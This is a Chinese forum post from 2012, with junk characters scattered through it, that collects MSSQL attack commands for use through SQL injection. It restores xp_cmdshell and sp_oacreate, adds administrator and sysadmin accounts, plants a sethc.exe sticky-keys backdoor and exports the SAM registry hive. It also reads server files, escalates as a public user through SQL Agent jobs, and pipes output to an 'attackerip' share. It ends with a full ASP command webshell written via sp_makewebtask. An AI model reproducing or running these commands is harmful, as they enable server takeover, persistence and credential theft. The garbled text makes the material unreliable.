1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号# _ N/ E& L+ c I: s
恢复方法:查询分离器连接后,6 `& l( f) V6 ^) O6 I' [- E/ m
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int + x1 V% {& ~! k+ ?! h$ g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 3 J/ s6 a; ]8 I! R& W5 v
然后按F5键命令执行完毕
5 f4 S9 s; V6 c) t$ u% g' _+ W
) p: o1 r( u9 \ Z0 B8 g2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)4 p* T" v- @9 {8 f+ }" ^
恢复方法:查询分离器连接后,
( u5 c0 j2 ?: b9 n6 L2 l第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell". `2 s' Q& y$ ?) C" D0 e4 K
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ ~; s4 I3 I- \3 V& i' q0 ] a, N; _然后按F5键命令执行完毕
& j4 J; E N. O2 H' a
6 M$ k: S9 Q( p* j$ Y9 T. P2 d3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
/ r) [) [& P! s. x; [$ Y恢复方法:查询分离器连接后,* X* N3 h. F% v& n+ L
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 U# H) p4 i; j/ P# r第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
2 f: ?& y t% B3 C! |3 J然后按F5键命令执行完毕
! F a' s8 h3 }; E( C6 C
9 b, d- C' m; G4 终极方法.3 ~* L- B# _, A& I
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:: H5 n7 A. u @3 M
查询分离器连接后,- R# o/ E) o- b8 ^2 _. M- g9 O
2000servser系统:
3 N6 c+ _! M" j& c) adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'2 W! C5 D. u6 C% z3 k4 J. j
P$ M# }# e4 Q0 Z3 q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' F4 j* l" j& `0 K2 Q2 f9 L6 ]
3 L9 O% u w+ N. c/ m% e+ `xp或2003server系统:
* r3 B* q3 m( A3 e" d+ N
' |$ ^/ G9 H9 v* Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'5 a3 j8 O" q S% m) D
: x- {+ u! z- I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'$ X7 C2 C. ]' K% c8 I+ U$ T) I
2 e/ Y3 N( s- N" U2 D! f$ `* P) |* F( |$ o# }! z1 x2 X; C
五个SHIFT/ j& K7 o2 w1 h+ `
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
- d5 M! V; G& S4 ~: m* S1 V8 b( K- X$ ~& s7 B9 w
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Y$ z$ Y% S& G/ O$ ~/ }. i0 T* Q* B% ?2 u0 {+ X& y' i1 W1 f
xp_cmdshell执行命令另一种方法
/ Q' @. k% ]0 P4 C" Vdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
. K1 G. F3 Y. n( f) v0 e" f- }2 F9 N9 ^7 k$ ?
判断存储扩展是否存在7 S( I1 T+ |% z. Q$ U
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'8 Z- L3 A7 k7 I, B% p* ~
返回结果为1就OK
2 d% Q2 e1 |1 S. Y5 p, Q( @* h$ L5 m5 e* {4 W$ Y4 p! D
4 }4 I' l V5 U: k/ _0 i, h
上传xplog70.dll恢复xp_cmdshell语句:# i: j+ w# l3 ?) {. V( }2 A0 G- F
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
& b- O8 T6 l. ^8 Q8 ~% o
8 I4 E- u3 }9 X- W( Z+ a2 y/ B否则上传xplog7.0.dll
) I+ {) c$ O6 _Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
. C) ^3 y% h" E2 K9 c& B, ?2 C. Q2 Z& @2 `: W( s' v
" Y$ r/ e, d1 s- r: H1 J$ |
# ?3 p% Y0 u a' G; ~首先开启沙盘模式: t! z6 D9 @8 r& {* G7 l9 S* L
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
% I9 A. Y8 W% @: u1 {
! d( o3 z+ @- K; e+ e然后利用jet.oledb执行系统命令9 j/ \" X; U/ e3 d2 @7 O' w
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')$ t4 R) g) ^7 z2 J3 K6 u, c; Y( z
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
3 C" D; J) `2 o" h" u; u
! h7 W, h$ z! i& s; H
3 K) W0 X1 q" n" Z0 K. S$ f; z
0 u6 y7 Q2 i% X( l0 ^% p0 ?- T0 B恢复过程sp_addextendedproc 如下: . _0 ]* @2 y- \7 s% z# y
create procedure sp_addextendedproc --- 1996/08/30 20:13
+ D5 S& D" N0 k; l7 S@functname nvarchar(517),/* (owner.)name of function to call */ " ?5 I- o8 y; Q4 p0 D
@dllname varchar(255)/* name of DLL containing function */ - ?% e) ^- p s# c! N
as * C L7 p/ g/ r2 U* s
set implicit_transactions off
* l6 P* f- s P! Y p+ B' f, Hif @@trancount > 0
# X( q6 _% e2 Z2 t$ s- tbegin 3 U) h, U3 \- q- W
raiserror(15002,-1,-1,'sp_addextendedproc') 7 u8 l" L0 w* K( e: r. U$ ]
return (1)
/ x. X M6 B$ J# O1 [- s: tend
3 Y' n0 ~- k- K* p3 Kdbcc addextendedproc( @functname, @dllname) - ?# t3 W9 a) p- X
return (0) -- sp_addextendedproc
6 R+ }; U' h6 W" E* q+ C# {3 {4 tGO 6 e2 m. A$ d* y: ?: H% s4 G" H$ k
9 r! `6 D) f8 T# K' P( X/ t4 I
( V# z0 a8 j* v ?0 T1 W9 U: Q1 {
6 j/ i9 q5 V _5 t2 a& ?
导出管理员密码文件
. b- m; O: B: X; s% dsa默认可以读sam键.应该。
' P+ r0 C* C( U9 H" vreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
0 ^$ r/ x$ T b* Nnet user administrator test
; O! b! ~4 u# G9 s1 G2 q0 M- \8 c用administrator登陆., L" o `! k! R8 L; F
用完机器后
+ v: ?+ d F) z4 k- Q" x' freg import c:\test.reg' w- U* s* R: l( ^! c7 v- Y
根本不用克隆.* W- H3 |: u& e# F; V, h. }8 N
找到对应的sid.
! H2 |! O+ X0 y0 c
3 H6 G, _* I7 r: o* B+ q- p1 y9 c8 |3 E3 V3 ~& e" z1 [1 f7 p8 L
+ ?1 V, g. i7 C' Y* y6 G
恢复所有存储过程
# o/ c+ _, L8 e7 B4 juse master , j9 G2 J" C; ^8 X d# Y e; y
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' ; w" {, R6 h( T: x8 q4 `
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
# q3 \. g4 L2 i( t( c, y# [exec sp_addextendedproc xp_loginconfig,'xplog70.dll' ! i* R" Z. z8 ?
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 4 P, t$ ^3 f/ n, c
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
, x# x# I$ p# {( ~. ~% A# h* |exec sp_addextendedproc sp_OACreate,'odsole70.dll' " \' o( `1 |! O, X. V8 U6 [8 t
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' # f; [+ a8 |+ z% W
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' # D+ u/ I, ~/ U+ Y6 W) D9 c
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' , [; e: F0 Q3 H3 V d9 q
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
2 s6 ]9 F# ~1 g( l7 [/ t4 Nexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
7 q, K- _$ p y" O" J7 Oexec sp_addextendedproc sp_OAStop,'odsole70.dll'
9 U, n9 @0 e# L5 [9 v5 o: K! Nexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
" W* c, ~9 F5 ?. }exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
4 w9 A- x3 h) e# `# F' |exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 5 J0 e! o5 N) v, E- ?% l0 g
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' & n, A v$ E5 z
exec sp_addextendedproc xp_regread,'xpstar.dll' 9 H5 Z7 n/ y" z0 x7 W( Q' i
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 8 f J6 p% h5 ]! _
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
7 r; o7 M/ w9 e! Z8 X" ]1 Gexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
6 ]/ Y* [- J3 I2 B% C9 C2 C* ~: [5 Q9 v; B
6 M: O% T2 _2 d% q( E, k
建立读文件的存储过程
+ c! }: h7 p) q; p$ Q! g9 qCreate proc sp_readTextFile @filename sysname
, ?9 }+ P j7 T. F2 Zas
: r) o; H' n: y+ }/ G& G
: `- u/ g: I+ i* D. e/ p1 W$ D* P begin 7 j# c4 a1 p. @& @; r( ~
set nocount on
2 q6 k) a( d) z- X. Y Create table #tempfile (line varchar(8000))% {& k0 ~7 |: s \6 J' |" {
exec ('bulk insert #tempfile from "' + @filename + '"'); S2 s2 W, _4 _: A$ G6 l4 [2 F: o: R
select * from #tempfile
* F" H c. r) z& Y& f f drop table #tempfile, M- x: ?" N" a2 M$ M
End6 V5 P5 M' m3 M _
/ k9 m- J2 W$ K) q; w0 N
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件5 w; N( ]9 N" ^, y' p+ b% B0 |6 W9 T
查看登录用户* e' W$ O, r- u" k5 ~' O! N2 @: O
Select * from sysxlogins
+ J) H! ~" n% o& g) k
: ]! B+ L" |2 D( O0 B+ B/ C& k$ p把文件内容读取到表中: `" {, L8 V. M- h. V; h
BULK INSERT tmp from "c:\test.txt"
6 w6 E o9 R& _- A7 m7 ~dElete from 表名 清理表里的内容% B1 h( c7 E; b0 R
create table b_test(fn nvarchar(4000));建一个表,字段为fn
7 {; C; ?- T+ ]5 p& f2 [* |1 s$ T5 ?, {
% `) j& H$ ?1 Z4 X. y7 J3 K4 ]7 U
加sa用户% j+ S& v! a9 c9 }: B
exec master.dbo.sp_addlogin user,pass;- D! M. {; c$ d: Z/ O) h# g6 p% l$ d
exec master.dbo.sp_addsrvrolemember user,sysadmin
0 b f. X, A1 E7 E: k2 [, g" ?$ k, R
: V: W F- ]4 d8 I: J" z( H0 N8 ]! P9 M* y1 ?( s
读文件代码' d- k% G. O1 O
declare @o int, @f int, @t int, @ret int
$ O. q0 f& v9 Zdeclare @line varchar(8000)1 g, R. @2 |. g1 Y0 d Z( V, M! K
exec sp_oacreate 'scripting.filesystemobject', @o out
. E, K# Y5 j, I" Y7 p; C: {) Jexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1) g) a- j2 T! q/ U# {- X
exec @ret = sp_oamethod @f, 'readline', @line out
[6 I; Q1 @9 ~0 N- P1 M2 S" V' kwhile( @ret = 0 )7 R0 g# l7 v2 R1 {, T# C, [( I; O$ x
begin: K7 B. _( k" d; ~4 s( f
print @line
: a7 l1 j/ p; c( Q/ H) q f6 |exec @ret = sp_oamethod @f, 'readline', @line out
$ o7 }7 o9 ~" \; ?/ Gend1 _; M8 J8 q4 [
# {: R: \% R* t4 v0 f% J5 Z o, O. U1 c0 |) G/ B
写文件代码:6 c E+ \) f# [: b& b* j7 c. J
declare @o int, @f int, @t int, @ret int
2 b+ k6 ^2 E7 c9 v. `" I: I% l! mexec sp_oacreate 'scripting.filesystemobject', @o out* V7 r7 V4 r4 B5 |/ J" X
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1: S0 P3 @& l# D, \0 Y+ I+ o
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》$ b7 C9 }' S' r8 K7 f% q
- x0 V7 \5 `- x& v. [' q4 ]' m, X5 [7 E# u- {9 x _6 n( ]
添加lake2 shell5 W6 V5 V H# d& [, ] _8 c. W
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll') B7 _0 H$ z4 {! b* z
sp_dropextendedproc xp_lake22 b+ d/ E# K: l0 ~( [0 U. i% b
EXEC xp_lake2 'net user'% K& i: n6 { M0 g/ Z
, i, \7 w$ _" w- R/ y
0 @6 i$ J+ v- M" U o) x/ t
得到硬盘文件信息 1 v' d6 [: t4 b5 m- @! c
--参数说明:目录名,目录深度,是否显示文件 - a# J, Z3 h1 R' i
execute master..xp_dirtree 'c:'
0 O$ x$ {* I2 w; S% A: Hexecute master..xp_dirtree 'c:',1
; w, O4 F5 R0 e( xexecute master..xp_dirtree 'c:',1,1 9 b2 l2 {. O- w/ o% O }* m3 m
L6 w9 m! J8 |! g3 X8 N( A, }! R, x& n
读serv-u配置信息8 z9 _/ m C9 |
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
; T% Q) G( U* e* ?) Q1 F5 U0 b) Rexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
; m1 X @/ o8 P" G3 `+ F5 x0 T! q! `- M/ I+ {
通过xp_regwrite写SHIFT后门
5 ~6 a, N0 m( b7 r7 q6 G% Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
/ S% F. E# {5 a
4 p6 \. m8 G. V+ w6 E/ x
" [& F/ Z' O, t9 x# }1 [+ F% ~) o0 t& m% _+ P
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
9 B- B6 k" o" z7 Mexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了& @ X3 |9 h% I6 |, t; h
) d/ l" l7 z [0 r8 S' j+ \9 q
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
9 W0 y7 [% M u+ }. V6 U. M" G! W+ N
# o) \4 w. `9 f- S
* w! N$ o; ]6 _, D- v, ?
sql server 2005下开启xp_cmdshell的办法; P8 ~& q( o+ b4 ~6 V
S: ?, P9 {; F, z
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
: z, Z# C7 [$ z: \0 P% `9 O9 H' ]* q1 V1 M4 Y( I) g, y! n/ J3 z1 @
SQL2005开启'OPENROWSET'支持的方法: \: i/ F* ]- Z1 h+ t. J
5 S3 \/ g4 x7 Z5 n! ~4 o7 r% G# |
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
8 Y! t# @5 O6 F7 y- k
$ T( P0 D( C3 VSQL2005开启'sp_oacreate'支持的方法:$ m* A) p- I/ W9 Z! A& ?0 |
, P& |% S8 f8 A8 ?4 z1 L
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;. ]" J& m' Y+ S d
9 n- N/ Q1 x D. W: b
/ F9 Z0 c: r' h- H% ]) H0 ^; u3 y0 g3 a, g2 u N. K
" N5 P" x' i* [% W) |* j. B T6 i& b0 O
6 m# a' c$ ^* |2 i" |3 Q" I- L m% H/ {& C) {, z. q. b" B) t
% Q5 r4 S+ x6 h& I- w7 z/ g! D6 ~7 O, T# U6 c
6 p1 q; S* K" s1 F9 A
& C+ L4 V: {9 d4 k& R; S
V, o, J/ A! I/ ]) s% y+ O" H9 X* f
b+ r8 |4 l0 @5 ]# y4 u3 m& E
; d/ ]# K/ y& a! [9 H# ?' R- C* }, B5 {$ ?
. ~8 H2 @2 p+ }% X, [1 |% f% P% {" p G2 i% ^* I1 S- A- {; @
! y1 n N! }( ]- l
. i; D0 U* T0 V J, E& L
( ]) F# ~: p6 a8 h
( w+ a, {9 T! u, z0 }" W
?/ W* d" P6 B4 _" D" a0 q# @/ r7 k4 p% Z' A5 W' v1 B
6 E, Y+ D+ u3 t5 ]6 ^以下方面不知道能不能成功暂且留下研究哈:
) S: o- i' n2 n; O, r: ]0 P* _4)
8 Z2 S: F- X& m: O& ~use msdb; --这儿不要是master哟9 a5 `1 I# i6 S O
exec sp_add_job @job_name= czy82 ;
( ~' x2 |7 S& H* Rexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;: w( ~' X8 V# Z8 b2 K: b2 E5 x$ r
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;4 }9 @4 E6 n$ g1 h0 p" d
exec sp_start_job @job_name= czy82 ;( t; }3 E' ~. _" L1 `6 I
4 s1 l. X* G: ]" I( g利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以; f; K( O8 @$ G' j9 x% Q
执行tsql语句了.3 _8 e1 P% w) D- W- t
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名2 E% G* Y+ `. t4 r: B
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
7 ]7 @- i u# Lnet start SQLSERVERAGENT9 V' k/ K8 X8 [6 `' K* T
. ^) n7 s {, q+ W( N对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的7 i4 x( x3 ?4 M7 Z
USE msdb
2 ? T/ r0 @. T9 ~. p+ @EXEC sp_add_job @job_name = GetSystemOnSQL ,
9 o0 G3 i+ Y# g' E+ p1 W0 d% {( l9 Y@enabled = 1,. b4 M7 {5 a+ r! L/ ^6 V$ N1 \; b
@description = This will give a low privileged user access to ]4 ]% b. r/ v- T( \4 `
xp_cmdshell ,0 @" e+ M* u0 v& a# Y1 e. E! f$ C' |8 a
@delete_level = 1, P0 W5 S* n) L2 H6 j& z
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
; d) I7 a1 I+ R@step_name = Exec my sql ,+ y- o- V" n9 V- L+ f" e3 o
@subsystem = TSQL ,
: H6 r5 h" G% u& w3 E& C@command = exec master..xp_execresultset N select exec
$ {, A9 n; O' V1 }( F3 [- rmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master : v8 U) i, T' v, Z$ U$ Y; {/ z
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
! u( ~: e* Z3 N5 x# N@server_name = 你的SQL的服务器名
% ]1 q5 R% m) k6 h. K( V0 KEXEC sp_start_job @job_name = GetSystemOnSQL % E3 F& c/ p* m
, k/ w9 y% \, L不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以( i# z! |- Y" k
才让我们可以以public执行xp_cmdshell
' t" [. |! C" t; l3 d0 M- h# x8 @: B
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
: Q1 Q6 D2 K: e! G4 b在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
5 ^% x% T) O$ H) f* ?( _+ u9 B& @) o/ h6 y
USE msdb
* E! g6 k. \: o8 X: EEXEC sp_add_job @job_name = ArbitraryFilecreate ,. E! K! B: _: x
@enabled = 1,. C8 ~0 `7 P7 Q' x. C
@description = This will create a file called c:\sqlafc123.txt ,* y0 ^, n( Y' T" a- B: b
@delete_level = 19 e7 Q, p1 X! a5 ?! k# \; C
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
$ }( d* l6 _. V/ z6 B$ _; D% e@step_name = SQLAFC ,, Q" u$ S8 \7 g# D& `
@subsystem = TSQL ," H. S( f& c+ m' ^- P/ i) M* a
@command = select hello, this file was created by the SQL Agent. ,
. N' @- B1 ]$ I) {- ~/ e9 K1 p; q@output_file_name = c:\sqlafc123.txt
& A% e/ [/ F4 X9 {. c, |EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
& ] G; z @9 M5 F9 ]# P6 I: @@server_name = SERVER_NAME
) @( n3 v& \" [5 H: o# s" \EXEC sp_start_job @job_name = ArbitraryFilecreate : `$ v, X9 R& D/ y
8 b! j! a' y7 x
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
0 g8 \( F: M1 `' M1 [: `8 x" F V
4 v4 n" X; n0 I8 O+ D! l+ N??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19. G1 g. b3 C; ^6 [; L
---------------------------------------------- y) H5 M7 t4 A9 M, W- A0 R
hello, this file was created by the SQL Agent.1 D5 K9 T( p3 X4 ?" O
* G/ I0 v& m; F( |4 k( w, c
(1 ?????)2 ]5 _& {+ S+ t8 X
! @, n$ C. k( q7 a
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员" u5 _9 c. j4 \& u5 q# \) O
命令的vbs文件到启动目录!
; Z" h( \# D8 t: F2 }& Z) x8 c9 a+ N7 X
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
- `& L: W; ^6 p, D5 t1 K* ?6 D关于sp_MScopyscriptfile 看下面的例子! x$ L1 I: U* _) e7 s
declare @command varchar(100) * z, R+ h& `( Q% P
declare @scripfile varchar(200)
3 v# x8 w- d/ j: O9 k Qset concat_null_yields_null off
?. @% U* z; U3 r3 rselect @command= dir c:\ > "\\attackerip\share\dir.txt" 4 `, ?4 X+ {4 j
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
+ f" I8 y( m* I* g, p/ f: ~; wexec sp_MScopyscriptfile @scripfile , 5 I* @( [. _- r$ {3 |. c/ l
- X) u+ T; C v6 s这两个东东都还在测试试哟# k1 T- c; I/ F
让MSSQL的public用户得到一个本机的web shell
. A% G$ l- V7 L: }- Z; |( e
' x, R/ j+ F2 A( O% Z7 Z+ tsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,! k3 q; \* T2 m
--@query= select <img src=vbscript:msgbox(now())>
) W4 B" Z% ?- Q# }1 ]' L* y; [& `--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
% i' S, W# s& z8 V@query= select
6 g, @; l& |: w<%On Error Resume Next 5 o! E, J6 ~1 X7 Q: N, h& m
Set oscript = Server.createObject("wscript.SHELL") ( c# ~; ^4 P/ ~1 u
Set oscriptNet = Server.createObject("wscript.NETWORK") ) z# i+ x( X3 a2 e
Set oFileSys = Server.createObject("scripting.FileSystemObject")
0 `) `6 M7 H- Y0 } KszCMD = Request.Form(".CMD")
! x ?8 G+ G# r4 l1 W. T3 NIf (szCMD <>"")Then
6 r t$ H& M9 z3 |, p# [szTempFile = "C:\" & oFileSys.GetTempName() \' u+ w1 I- k) b' J, c& Q
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
" @8 Q4 X4 c7 r0 O9 p" U" fSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) - Y. \/ y8 Z. K) X; o/ r5 f
End If %> " ^' _3 P* v9 v
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
) T! e) _0 n& z4 n: s, |+ G<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
' T( J, {* Z$ K0 ?</FORM><RE>
- W8 P; I( [: \3 x9 ~<% If (IsObject(oFile))Then
( w( k+ y2 \. h w! y& _1 r7 |# dOn Error Resume Next 3 K) g, e& C8 d3 M/ T
Response.Write Server.HTMLEncode(oFile.ReadAll)
# b" p/ i1 K' I+ zoFile.Close
o: K( g; j1 i) m! KCall oFileSys.deleteFile(szTempFile, True) 9 ~, G2 u3 ^3 h( u6 W+ z0 J+ Q
End If%> * t% X! y B1 R! I, S! d
</BODY></HTML> ! D" e$ q$ I, `) V
|
发表于 2012-9-15 14:37:30
收藏
支持
反对